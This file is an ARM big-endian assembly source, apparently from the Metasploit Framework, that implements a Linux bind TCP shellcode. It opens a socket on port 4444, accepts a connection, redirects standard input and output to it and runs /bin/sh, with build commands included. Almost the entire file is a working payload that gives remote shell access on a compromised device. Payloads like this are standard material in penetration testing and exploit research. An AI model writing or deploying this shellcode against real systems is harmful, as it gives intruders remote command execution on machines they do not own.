118 lines
2.0 KiB
ArmAsm
118 lines
2.0 KiB
ArmAsm
@@
|
|
@
|
|
@ Name: single_sock_bind
|
|
@ Qualities: -
|
|
@ Authors: Balazs Bucsay <@xoreipeip>
|
|
@ License: MSF_LICENSE
|
|
@ Description:
|
|
@
|
|
@ Implementation of a Linux bind TCP shellcode for ARM BE architecture.
|
|
@
|
|
@ Assemble with:
|
|
@ armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o
|
|
@ Link with:
|
|
@ armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode
|
|
@
|
|
@ Meta-Information:
|
|
@
|
|
@ meta-shortname=Linux Bind TCP
|
|
@ meta-description=Listen on a port for a connection and run a second stage
|
|
@ meta-authors=earthquake
|
|
@ meta-os=linux
|
|
@ meta-arch=armbe
|
|
@ meta-category=singles
|
|
@ meta-connection-type=bind
|
|
@ meta-name=bind_tcp
|
|
@@
|
|
|
|
|
|
.section .text
|
|
.global _start
|
|
|
|
_start:
|
|
.code 32
|
|
|
|
@ Thumb-Mode on
|
|
add r6, pc, #1
|
|
bx r6
|
|
.code 16
|
|
|
|
@ _socket(2,1,0)
|
|
sub r2, r2, r2
|
|
add r1, r2, #1
|
|
add r0, r2, #2
|
|
lsl r7, r1, #8
|
|
add r7, r7, #0x19
|
|
svc 1
|
|
mov r6, r0
|
|
|
|
@ 1 uint8_t sin_len
|
|
@ 1 sa_family_t sin_family
|
|
@ 2 in_port_t sin_port
|
|
@ 4 struct in_addr sin_addr
|
|
@ 8 char sin_zero [8]
|
|
@ 00 02 5C11 00000000 00000000 00000000
|
|
@ 5c11 => 4444
|
|
@ _bind()
|
|
mov r2, #2
|
|
lsl r2, r2, #8
|
|
add r2, r2, #0x11
|
|
lsl r2, r2, #8
|
|
add r2, r2, #0x5C
|
|
sub r3, r3, r3
|
|
sub r4, r4, r4
|
|
sub r5, r5, r5
|
|
mov r1, sp
|
|
stm r1!, {r2-r5}
|
|
sub r1, #0x10
|
|
mov r2, #16
|
|
add r7, r7, #1
|
|
svc 1
|
|
|
|
@ _listen()
|
|
mov r0, r6
|
|
sub r1, r1, r1
|
|
add r7, r7, #2
|
|
svc 1
|
|
|
|
@ _accept()
|
|
mov r0, r6
|
|
sub r2, r2, r2
|
|
add r7, r7, #1
|
|
svc 1
|
|
mov r6, r0
|
|
|
|
@ _dup2()
|
|
sub r1, r1, r1
|
|
mov r7, #63
|
|
svc 1
|
|
|
|
mov r0, r6
|
|
add r1, r1, #1
|
|
svc 1
|
|
|
|
mov r0, r6
|
|
add r1, r1, #1
|
|
svc 1
|
|
|
|
_execve()
|
|
sub r2, r2, r2
|
|
mov r0, pc
|
|
add r0, #18
|
|
@ next intstruction terminates the string beneath the code "//bin/sh"
|
|
@ in case you want to say goodbye to the null character
|
|
@ str r2, [r0, #8]
|
|
str r2, [sp, #8]
|
|
str r0, [sp, #4]
|
|
add r1, sp, #4
|
|
mov r7, #11
|
|
svc 1
|
|
|
|
@ _exit()
|
|
sub r4, r4, r4
|
|
mov r0, r4
|
|
mov r7, #1
|
|
svc 1
|
|
.ascii "//bin/sh\0"
|
|
@.ascii "//bin/sh"
|